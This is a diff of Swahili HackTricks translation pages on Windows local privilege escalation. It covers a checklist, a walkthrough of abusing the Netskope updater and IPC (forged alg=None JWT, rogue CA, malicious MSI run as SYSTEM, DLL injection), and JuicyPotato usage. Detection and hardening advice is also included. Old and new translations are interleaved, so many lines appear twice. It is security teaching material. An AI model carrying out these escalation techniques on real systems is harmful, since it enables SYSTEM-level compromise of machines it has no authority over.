- [ ] Je, unaweza **kubadilisha** **binary** inayotekelezwa na service yoyote? (windows-local-privilege-escalation/index.html#modify-service-binary-path)
- [ ] Je, unaweza **kubadilisha** **registry** ya service yoyote? (windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
- [ ] Je, unaweza kuchukua faida ya njia ya binary isiyo na nukuu ya service yoyote? (windows-local-privilege-escalation/index.html#unquoted-service-paths)
### [**Applications**](windows-local-privilege-escalation/index.html#applications)
### [Programu](windows-local-privilege-escalation/index.html#applications)
- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions)
- [ ] [**Write**] ruhusa kwenye programu zilizosakinishwa (windows-local-privilege-escalation/index.html#write-permissions)
- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup)
- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/index.html#drivers)
- [ ] [**Vulnerable** Drivers](windows-local-privilege-escalation/index.html#drivers)
### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking)
- [ ] Je, unaweza **write in any folder inside PATH**?
- [ ] Je, kuna binary ya huduma inayojulikana ambayo **tries to load any non-existant DLL**?
- [ ] Je, unaweza **write** in any **binaries folder**?
- [ ] Je, unaweza **kuandika** katika folda yoyote ndani ya PATH?
- [ ] Je, kuna binary ya service inayojulikana ambayo **inajaribu kupakia DLL isiyokuwepo**?
- [ ] Je, unaweza **kuandika** katika **folder za binaries** yoyote?
### [Network](windows-local-privilege-escalation/index.html#network)
### [Mtandao](windows-local-privilege-escalation/index.html#network)
- [ ] Orodhesha mtandao (shares, interfaces, routes, neighbours, ...)
- [ ] Angalia kwa makini network services listening on localhost (127.0.0.1)
- [ ] Fanya uorodheshaji wa mtandao (shares, interfaces, routes, neighbours, ...)
- [ ] Tazama kwa makini huduma za mtandao zinazolisikiliza localhost (127.0.0.1)
### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials)
- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)credentials
- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials) credentials
- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) credentials ambazo unaweza kutumia?
- [ ] Taarifa za kuvutia katika [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)?
- [ ] Manenosiri za mitandao zilizohifadhiwa za [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)?
- [ ] Je, kuna [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi) za kuvutia?
- [ ] Nywila za [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)?
- [ ] Taarifa za kuvutia katika [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
- [ ] Manenosiri katika [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)?
- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) manenosiri?
- [ ] Nywila katika [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)?
- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) nywila?
- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Credentials?
- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading?
@ -90,19 +90,19 @@
- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
- [ ] Manenosiri katika [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)?
- [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup?
- [ ] Nywila katika [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)?
- [ ] Kuna nakala za kuhifadhi za [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups)?
- [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)?
- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) file?
- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
- [ ] Nenosiri katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
- [ ] Nywila katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
- [ ] Taarifa za kuvutia katika [**web** **logs**](windows-local-privilege-escalation/index.html#logs)?
- [ ] Unataka [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) kwa mtumiaji?
- [ ] Taarifa za kuvutia katika [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
- [ ] Unataka [**kuomba nywila**](windows-local-privilege-escalation/index.html#ask-for-credentials) kutoka kwa mtumiaji?
- [ ] Faili za kuvutia ndani ya [**Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
- [ ] Mengine [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)?
- [ ] Ndani ya [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, history, bookmarks, ...)?
- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika faili na registry
- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) to automatically search for passwords
- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika files na registry
- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) za kutafuta nywila moja kwa moja
### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers)
@ -110,6 +110,6 @@
### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
- [ ] Angalia ikiwa unaweza kuitumia vibaya
- [ ] Kagua kama unaweza kuiboresha (abuse) hiyo
{{#include ../banners/hacktricks-training.md}}

639
src/windows-hardening/windows-local-privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

100
src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md
View File

@ -1,28 +1,28 @@
# Kutumiwa Vibaya kwa Auto-Updaters za Shirika na IPC zilizo na Vibali (e.g., Netskope stAgentSvc)
# Kutumia Vibaya Auto-Updaters za Enterprise na Privileged IPC (mf., Netskope stAgentSvc)
{{#include ../../banners/hacktricks-training.md}}
Ukurasa huu unazungumzia darasa la Windows local privilege escalation chains zinazopatikana katika endpoint agents na updaters za shirika ambazo zinaonyesha uso wa IPC wa lowfriction na mtiririko wa update wenye vibali. Mfano unaowakilisha ni Netskope Client for Windows < R129 (CVE-2025-0309), ambapo mtumiaji mwenye vibali vya chini anaweza kulazimishwa kujiunga na server inayodhibitiwa na mshambuliaji kisha kuwasilisha MSI ya uharibifu ambayo service ya SYSTEM inaisakinisha.
Ukurasa huu unagawa kwa ujumla daraja la chains za Windows local privilege escalation zilizopatikana kwenye enterprise endpoint agents na updaters zinazotoa uso wa IPC rahisi kutumia na mchakato wa masasisho wenye ruhusa za juu. Mfano unaowakilisha ni Netskope Client for Windows < R129 (CVE-2025-0309), ambapo mtumiaji mwenye ruhusa ndogo anaweza kulazimisha enrollment kwenye server inayodhibitiwa na mshambuliaji na kisha kuwasilisha MSI ya uharibifu ambayo huduma ya SYSTEM inaisakinisha.
Mawazo muhimu unayoweza kutumia dhidi ya bidhaa zinazofanana:
- Abuse a privileged services localhost IPC to force reenrollment or reconfiguration to an attacker server.
- Implement the vendors update endpoints, deliver a rogue Trusted Root CA, and point the updater to a malicious, “signed” package.
- Evade weak signer checks (CN allowlists), optional digest flags, and lax MSI properties.
- If IPC is “encrypted”, derive the key/IV from worldreadable machine identifiers stored in the registry.
- If the service restricts callers by image path/process name, inject into an allowlisted process or spawn one suspended and bootstrap your DLL via a minimal threadcontext patch.
Mafikra muhimu unaweza kuyatumia dhidi ya bidhaa zinazofanana:
- Tumia localhost IPC ya huduma iliyo na ruhusa za juu kulazimisha reenrollment au reconfiguration kwenda kwenye server ya mshambuliaji.
- Tekeleza endpoints za vendor za update, wasilishe rogue Trusted Root CA, na elekeza updater kwa package hatari, “signed”.
- Epuka ukaguzi dhaifu wa signer (CN allowlists), flags za digest za hiari, na mali za MSI zilizo na uvumilivu mdogo.
- Ikiwa IPC ime “encrypted”, zaa key/IV kutoka kwa vitambulisho vya mashine vinavyososwa kwa kusomeka na wote kwenye registry.
- Ikiwa huduma inazuia waite kwa image path/process name, weka injection kwenye process iliyoorodheshwa kwenye allowlist au zalisha moja kwa status suspended na bootstrap DLL yako kupitia mabadiliko madogo ya threadcontext.
---
## 1) Forcing enrollment to an attacker server via localhost IPC
## 1) Kulazimisha enrollment kwenye server ya mshambuliaji kupitia localhost IPC
Wakala wengi hutoa mchakato wa usermode UI ambao unazungumza na service ya SYSTEM juu ya localhost TCP kwa kutumia JSON.
Wakala wengi huambatanisha mchakato wa UI wa usermode ambao unazungumza na huduma ya SYSTEM juu ya localhost TCP kwa kutumia JSON.
Imeonekana katika Netskope:
- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM)
- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN
Exploit flow:
1) Craft a JWT enrollment token whose claims control the backend host (e.g., AddonUrl). Use alg=None so no signature is required.
2) Send the IPC message invoking the provisioning command with your JWT and tenant name:
Mtiririko wa exploit:
1) Tunga token ya JWT ya enrollment yenye claims zinazoamua backend host (mf., AddonUrl). Tumia alg=None ili saini isiwe muhimu.
2) Tuma ujumbe wa IPC unaoitisha amri ya provisioning ukiweka JWT yako na jina la tenant:
```json
{
"148": {
@ -31,88 +31,88 @@ Exploit flow:
}
}
```
3) Service inaanza kuwasiliana na rogue server yako kwa ajili ya enrollment/config, kwa mfano:
3) Huduma inaanza kuwasiliana na rogue server yako kwa ajili ya enrollment/config, kwa mfano:
- /v1/externalhost?service=enrollment
- /config/user/getbrandingbyemail
Vidokezo:
- Ikiwa uthibitishaji wa mtumaji unategemea njia/jina, tuma ombi kutoka kwa vendor binary iliyoorodheshwa kwenye orodha ya kuruhusiwa (angalia §4).
- Ikiwa caller verification inategemea path/namebased, anzisha ombi kutoka kwa vendor binary iliyoorodheshwa (angalia §4).
---
## 2) Hijacking the update channel to run code as SYSTEM
## 2) Kuiba chaneli ya masasisho ili kuendesha msimbo kama SYSTEM
Mara client inapozungumza na server yako, tekeleza endpoints zinazotarajiwa na ielekeze kwa attacker MSI. Mfuatano wa kawaida:
Mara client anapozungumza na server yako, tekeleza endpoints zinazotarajiwa na muelekeze kwa MSI ya mshambuliaji. Mfuatano wa kawaida:
1) /v2/config/org/clientconfig → Rudisha JSON config yenye kipindi kifupi sana cha updater, kwa mfano:
1) /v2/config/org/clientconfig → Rudisha JSON config yenye muda mfupi sana wa updater, kwa mfano:
```json
{
"clientUpdate": { "updateIntervalInMin": 1 },
"check_msi_digest": false
}
```
2) /config/ca/cert → Rudisha cheti cha CA katika fomati PEM. Huduma inakisakinisha katika Local Machine Trusted Root store.
3) /v2/checkupdate → Weka metadata inayorejelea MSI haribifu na toleo bandia.
2) /config/ca/cert → Rejesha PEM CA certificate. Huduma inaiweka kwenye Local Machine Trusted Root store.
3) /v2/checkupdate → Toa metadata inayorejelea MSI hasidi na toleo bandia.
Bypassing common checks seen in the wild:
- Signer CN allowlist: huduma inaweza tu kuangalia Subject CN ni “netSkope Inc” au “Netskope, Inc.”. CA yako ya uhalifu inaweza kutoa leaf yenye CN hiyo na kusaini MSI.
- CERT_DIGEST property: jumuisha mali ya MSI isiyoharibu yenye jina CERT_DIGEST. Hakuna utekelezaji wa lazima wakati wa usakinishaji.
- Optional digest enforcement: config flag (e.g., check_msi_digest=false) inazima uthibitishaji wa ziada wa kriptografia.
- Signer CN allowlist: huduma inaweza tu kuangalia Subject CN ikiwa ni sawa na “netSkope Inc” au “Netskope, Inc.”. Rogue CA yako inaweza kutoa leaf yenye CN hiyo na kusaini MSI.
- CERT_DIGEST property: jumuisha mali ya MSI isiyo hatari iitwayo CERT_DIGEST. Hakuna utekelezaji wakati wa usakinishaji.
- Optional digest enforcement: bendera ya config (mf., check_msi_digest=false) inazima uthibitishaji wa ziada wa kriptografia.
Matokeo: service ya SYSTEM inakisakinisha MSI yako kutoka
Result: huduma ya SYSTEM inasakinisha MSI yako kutoka
C:\ProgramData\Netskope\stAgent\data\*.msi
ikitekeleza nambari yoyote kama NT AUTHORITY\SYSTEM.
ikitekeleza msimbo wowote kama NT AUTHORITY\SYSTEM.
---
## 3) Forging encrypted IPC requests (when present)
Kutoka R127, Netskope ilifunika IPC JSON katika uwanja encryptData unaoonekana kama Base64. Reversing ilionyesha AES yenye key/IV zinazotokana na thamani za registry zinazoweza kusomwa na mtumiaji yeyote:
From R127, Netskope wrapped IPC JSON in an encryptData field that looks like Base64. Reversing showed AES with key/IV derived from registry values readable by any user:
- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew
- IV = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
Wavamizi wanaweza kuiga encryption na kutuma amri za IPC zenye encryption halali kutoka kwa mtumiaji wa kawaida. Ushauri wa jumla: ikiwa agent kwa ghafla “inaficha” IPC yake, tazama device IDs, product GUIDs, install IDs chini ya HKLM kama nyenzo za encryption.
Wavamizi wanaweza kurudia usimbaji na kutuma amri za kusimbwa halali kutoka kwa mtumiaji wa kawaida. Kidokezo kwa ujumla: ikiwa agent ghafla “encrypts” IPC yake, angalia device IDs, product GUIDs, install IDs chini ya HKLM kama nyenzo.
---
## 4) Bypassing IPC caller allowlists (path/name checks)
Huduma zingine hujaribu kuthibitisha peer kwa kutatua PID ya muunganisho wa TCP na kulinganisha image path/name dhidi ya binaries zilizoorodheshwa za vendor chini ya Program Files (mfano stagentui.exe, bwansvc.exe, epdlp.exe).
Some services try to authenticate the peer by resolving the TCP connections PID and comparing the image path/name against allowlisted vendor binaries located under Program Files (e.g., stagentui.exe, bwansvc.exe, epdlp.exe).
Njia mbili za vitendo:
- DLL injection ndani ya process iliyo kwenye allowlist (mfano nsdiag.exe) na kushika/proxy IPC kutoka ndani yake.
- Piga kengele binary iliyoorodheshwa ikifufuliwa kwa hali ya suspended na kuanzisha DLL yako ya proxy bila CreateRemoteThread (see §5) ili kutosheleza sheria zilizotekelezwa na driver kuzuia tampering.
Two practical bypasses:
- DLL injection into an allowlisted process (e.g., nsdiag.exe) and proxy IPC from inside it.
- Spawn an allowlisted binary suspended and bootstrap your proxy DLL without CreateRemoteThread (see §5) to satisfy driverenforced tamper rules.
---
## 5) Tamperprotection friendly injection: suspended process + NtContinue patch
Products mara nyingi huja na minifilter/OB callbacks driver (mfano Stadrv) inayokata haki hatari kutoka kwa handles za processes zilizo na ulinzi:
- Process: inatoa mazingira kama PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME
- Thread: inazuia hadi THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE
Products often ship a minifilter/OB callbacks driver (e.g., Stadrv) to strip dangerous rights from handles to protected processes:
- Process: removes PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME
- Thread: restricts to THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE
Loader ya usermode inayotegemewa na kuheshimu vikwazo hivi:
1) CreateProcess ya vendor binary na CREATE_SUSPENDED.
2) Pata handles ambazo bado unaruhusiwa: PROCESS_VM_WRITE | PROCESS_VM_OPERATION kwa process, na thread handle yenye THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (au tu THREAD_RESUME ikiwa unatayarisha code kwenye RIP inayojulikana).
3) Andika juu ya ntdll!NtContinue (au thunk nyingine ya mapema, iliyoorodheshwa kwa hakika) kwa stub ndogo inayopiga LoadLibraryW kwenye path ya DLL yako, kisha kuruka kurudi.
4) ResumeThread ili kuamsha stub yako ndani ya process, ikipakia DLL yako.
Loader ya usermode yenye kuaminika inayoheshimu vikwazo hivi:
1) CreateProcess ya binary ya vendor kwa CREATE_SUSPENDED.
2) Pata handles unazoruhusiwa nadal: PROCESS_VM_WRITE | PROCESS_VM_OPERATION kwenye process, na thread handle yenye THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (au THREAD_RESUME tu ikiwa unatengeneza patch kwenye RIP inayojulikana).
3) Andika juu ntdll!NtContinue (au thunk nyingine ya mapema, iliyohakikishiwamapped) na stub ndogo inayomwita LoadLibraryW kwa path ya DLL yako, kisha irudi.
4) ResumeThread ili kusababisha stub yako ndani ya process, ikipakia DLL yako.
Kwa sababu haukutumia PROCESS_CREATE_THREAD au PROCESS_SUSPEND_RESUME kwenye process iliyokuwa tayari na ulinzi (uliiunda wewe), sera ya driver inatimizwa.
Kwa kuwa hukutumia PROCESS_CREATE_THREAD au PROCESS_SUSPEND_RESUME juu ya process tayari iliyoprotected (uliunda wewe), sera ya driver inatimizwa.
---
## 6) Practical tooling
- NachoVPN (Netskope plugin) inaendesha otomatiki rogue CA, kusaini MSI haribifu, na kutumika kupeana endpoints zinazohitajika: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
- UpSkope ni custom IPC client inayotengeneza ujumbe wowote wa IPC (hiari kwa AESencryption) na inajumuisha suspendedprocess injection ili asili iwe kutoka kwa binary iliyoorodheshwa.
- NachoVPN (Netskope plugin) inautomate rogue CA, kusaini MSI hasidi, na kutumikia endpoints zinazohitajika: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
- UpSkope ni custom IPC client inayotengeneza ujumbe wa IPC yoyote (hiari kwa AESencrypted) na inajumuisha suspendedprocess injection ili uitoke kutoka kwa binary iliyoorodheshwa.
---
## 7) Detection opportunities (blue team)
- Simamia uongezaji wa Local Machine Trusted Root. Sysmon + registrymod eventing (see SpecterOps guidance) hufanya kazi vizuri.
- Tambua utekelezaji wa MSI ulioanzishwa na service ya agent kutoka paths kama C:\ProgramData\<vendor>\<agent>\data\*.msi.
- Angalia logs za agent kwa hosts/tenants zisizotarajiwa za enrollment, kwa mfano: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log tafuta addonUrl / tenant anomalies na provisioning msg 148.
- Toa alarm juu ya localhost IPC clients ambao si binaries zilizotarajiwa kusainiwa, au wanaotokana na miti ya child process isiyo ya kawaida.
- Monitor additions to Local Machine Trusted Root. Sysmon + registrymod eventing (see SpecterOps guidance) inafanya kazi vizuri.
- Flag MSI executions initiated by the agents service from paths like C:\ProgramData\<vendor>\<agent>\data\*.msi.
- Review agent logs for unexpected enrollment hosts/tenants, e.g.: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log angalia addonUrl / tenant anomalies na provisioning msg 148.
- Alert on localhost IPC clients that are not the expected signed binaries, or that originate from unusual child process trees.
---
## Hardening tips for vendors
- Gana enrollment/update hosts kwa allowlist kali; kataa domains zisizo salama katika clientcode.
- Thibitisha IPC peers kwa primitives za OS (ALPC security, namedpipe SIDs) badala ya ukaguzi wa image path/name.
- Weka nyenzo za siri nje ya HKLM zinazosomeka kwa wote; ikiwa IPC lazima iwe encrypted, zaa keys kutoka kwa siri zilizo na ulinzi au zigadilishe juu ya channels zilizo thibitishwa.
- Tendea updater kama uso wa supplychain: hitaji mnyororo kamili hadi CA uamiliki, thibitisha signatures za package dhidi ya pinned keys, na fail closed ikiwa validation imezimwa katika config.
- Bind enrollment/update hosts to a strict allowlist; reject untrusted domains in clientcode.
- Authenticate IPC peers with OS primitives (ALPC security, namedpipe SIDs) instead of image path/name checks.
- Keep secret material out of worldreadable HKLM; if IPC must be encrypted, derive keys from protected secrets or negotiate over authenticated channels.
- Treat the updater as a supplychain surface: require a full chain to a trusted CA you control, verify package signatures against pinned keys, and fail closed if validation is disabled in config.
## References
- [Advisory Netskope Client for Windows Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/)

87
src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
View File

@ -2,58 +2,57 @@
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING] > JuicyPotato ni ya zama. Kwa ujumla inafanya kazi kwenye matoleo ya Windows hadi Windows 10 1803 / Windows Server 2016. Mabadiliko ya Microsoft yaliyoanza kuingia katika Windows 10 1809 / Server 2019 yalivunja mbinu asilia. Kwa matoleo hayo na mapya zaidi, fikiria mbadala za kisasa kama PrintSpoofer, RoguePotato, SharpEfsPotato/EfsPotato, GodPotato na wengine. Tazama ukurasa hapo chini kwa chaguzi na matumizi za kisasa.
> [!WARNING] > JuicyPotato ni ya zamani. Kwa kawaida hufanya kazi kwenye matoleo ya Windows hadi Windows 10 1803 / Windows Server 2016. Mabadiliko ya Microsoft yaliyoanza kuwasilishwa kuanzia Windows 10 1809 / Server 2019 yalivunja mbinu ya asili. Kwa matoleo hayo na baadaye, fikiria mbadala za kisasa kama PrintSpoofer, RoguePotato, SharpEfsPotato/EfsPotato, GodPotato na wengine. Angalia ukurasa hapa chini kwa chaguzi za kisasa na matumizi.
{{#ref}}
roguepotato-and-printspoofer.md
{{#endref}}
## Juicy Potato (kudhulumu vibali vya dhahabu) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
## Juicy Potato (abusing the golden privileges) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
_A sugared version of_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, with a bit of juice, i.e. **another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM**_
_Toleo lililoboreshwa la_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, na kuongeza kidogo, yaani **another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM**_
#### You can download juicypotato from [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
#### Unaweza kupakua juicypotato kutoka [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
### Compatibility quick notes
### Vidokezo vya haraka vya utangamano
- Inafanya kazi kwa kuaminika hadi Windows 10 1803 na Windows Server 2016 wakati muktadha wa sasa una SeImpersonatePrivilege au SeAssignPrimaryTokenPrivilege.
- Imevunjwa na hardening ya Microsoft katika Windows 10 1809 / Windows Server 2019 na baadaye. Tumia mbadala zilizo kwenye link hapo juu kwa matoleo hayo na mapya.
- Imevunjika kwa sababu ya hatua za kuimarisha za Microsoft katika Windows 10 1809 / Windows Server 2019 na baadaye. Tumia mbadala zilizotajwa hapo juu kwa matoleo hayo.
### Summary <a href="#summary" id="summary"></a>
### Muhtasari <a href="#summary" id="summary"></a>
[**From juicy-potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) and its [variants](https://github.com/decoder-it/lonelypotato) leverages the privilege escalation chain based on [`BITS`](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx>) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) having the MiTM listener on `127.0.0.1:6666` and when you have `SeImpersonate` or `SeAssignPrimaryToken` privileges. During a Windows build review we found a setup where `BITS` was intentionally disabled and port `6666` was taken.
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) na [variants](https://github.com/decoder-it/lonelypotato) inategemea privilege escalation chain iliyo msingi kwenye [`BITS`](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx>) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) kuwa na kipokezi cha MiTM kwenye `127.0.0.1:6666` na wakati una `SeImpersonate` au `SeAssignPrimaryToken` privileges. Wakati wa mapitio ya kujenga Windows tulipata usanidi ambapo `BITS` ilizimwa kwa kusudi na bandari `6666` ilikuwa imechukuliwa.
We decided to weaponize [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Say hello to Juicy Potato**.
Tukaamua kuitumia kama silaha [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Say hello to Juicy Potato**.
> For the theory, see [Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) and follow the chain of links and references.
> Kwa nadharia, angalia [Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) na fuata mnyororo wa viungo na rejea.
Tuligundua kuwa, mbali na `BITS`, kuna servere kadhaa za COM tunaweza kuzitumia vibaya. Zinahitaji tu:
Tuligundua kwamba, mbali na `BITS`, kuna seva kadhaa za COM tunazoweza kutumia vibaya. Zinahitaji tu:
1. kuzinduliwa na mtumiaji wa sasa, kawaida “service user” ambaye ana impersonation privileges
1. kuwa zinazowezekana kuanzishwa na mtumiaji wa sasa, kawaida “service user” ambaye ana impersonation privileges
2. kutekeleza interface ya `IMarshal`
3. kukimbia kama mtumiaji mwenye viwango vya juu (SYSTEM, Administrator, …)
3. kuendesha kama mtumiaji aliye na haki za juu (SYSTEM, Administrator, …)
Baada ya majaribio tulipata na kujaribu orodha ndefu ya [interesting CLSIDs](http://ohpe.it/juicy-potato/CLSID/) kwenye matoleo mbalimbali ya Windows.
Baada ya majaribio kadhaa tulipata na kujaribu orodha kubwa ya [interesting CLSIDs](http://ohpe.it/juicy-potato/CLSID/) kwenye matoleo mbalimbali ya Windows.
### Juicy details <a href="#juicy-details" id="juicy-details"></a>
### Maelezo ya kina <a href="#juicy-details" id="juicy-details"></a>
JuicyPotato inakuwezesha:
- **Target CLSID** _chagua CLSID yoyote unayotaka._ [_Here_](http://ohpe.it/juicy-potato/CLSID/) _unaweza kupata orodha iliyopangwa kwa OS._
- **COM Listening port** _taja COM listening port unayopendeleo (badala ya marshalled hardcoded 6666)_
- **COM Listening IP address** _weke server kusikiliza kwenye IP yoyote_
- **Process creation mode** _kutegemea vibali vya mtumiaji aliyefanyakwa impersonation unaweza kuchagua kutoka:_
- **COM Listening port** _ainisha COM listening port unayopendelea (badala ya marshalled hardcoded 6666)_
- **COM Listening IP address** _fungua server kwa anwani yoyote ya IP_
- **Process creation mode** _kulingana na vibali vya mtumiaji aliyefanyiwa impersonation unaweza kuchagua kati ya:_
- `CreateProcessWithToken` (needs `SeImpersonate`)
- `CreateProcessAsUser` (needs `SeAssignPrimaryToken`)
- `both`
- **Process to launch** _anzisha executable au script ikiwa the exploitation itafanikiwa_
- **Process Argument** _rekebisha vigezo vya process iliyozinduliwa_
- **RPC Server address** _kwa njia ya kimyadariko unaweza ku-authenticate kwenye RPC server ya nje_
- **RPC Server port** _inayofaa ikiwa unataka ku-authenticate kwenye server ya nje na firewall inazuia bandari `135`…_
- **TEST mode** _hasa kwa madhumuni ya kujaribu, yaani kujaribu CLSIDs. Inaunda DCOM na inachapisha mtumiaji wa token. See_ [_here for testing_](http://ohpe.it/juicy-potato/Test/)
- **Process to launch** _anzisha executable au script ikiwa exploitation itafanikiwa_
- **Process Argument** _binafsisha hoja za mchakato unaoanzishwa_
- **RPC Server address** _kwa njia ya siri unaweza kuthibitisha kwenye RPC server ya nje_
- **RPC Server port** _inayofaa kama unataka kuthibitisha kwenye server ya nje na firewall inazuia port `135`…_
- **TEST mode** _hasa kwa madhumuni ya majaribio, yaani kujaribu CLSIDs. Inaunda DCOM na kuonyesha mtumiaji wa token. Tazama_ [_here for testing_](http://ohpe.it/juicy-potato/Test/)
### Usage <a href="#usage" id="usage"></a>
```
@ -76,26 +75,26 @@ Optional args:
[**From juicy-potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
Ikiwa mtumiaji ana vibali vya `SeImpersonate` au `SeAssignPrimaryToken` basi wewe ni **SYSTEM**.
Ikiwa mtumiaji ana haki za `SeImpersonate` au `SeAssignPrimaryToken` basi wewe ni **SYSTEM**.
Karibu haiwezekani kuzuia matumizi mabaya ya COM Servers zote hizi. Unaweza kufikiria kubadilisha ruhusa za vitu hivi kupitia `DCOMCNFG`, lakini bahati nzuri — hii itakuwa changamoto.
Karibu haiwezekani kuzuia matumizi mabaya ya COM Servers wote hawa. Unaweza kufikiria kubadilisha ruhusa za vitu hivi kupitia `DCOMCNFG` lakini bahati njema, hii itakuwa changamoto.
Suluhisho halisi ni kulinda akaunti na programu nyeti ambazo zinaendesha chini ya akaunti za `* SERVICE`. Kusimamisha `DCOM` hakika kutazuia exploit hii lakini kunaweza kuwa na athari kubwa kwa OS ya msingi.
Suluhisho halisi ni kulinda akaunti nyeti na programu zinazofanya kazi chini ya akaunti za `* SERVICE`. Kuzuia `DCOM` kunaweza kuzuia kabisa exploit hii lakini kunaweza kuwa na athari kubwa kwa OS ya msingi.
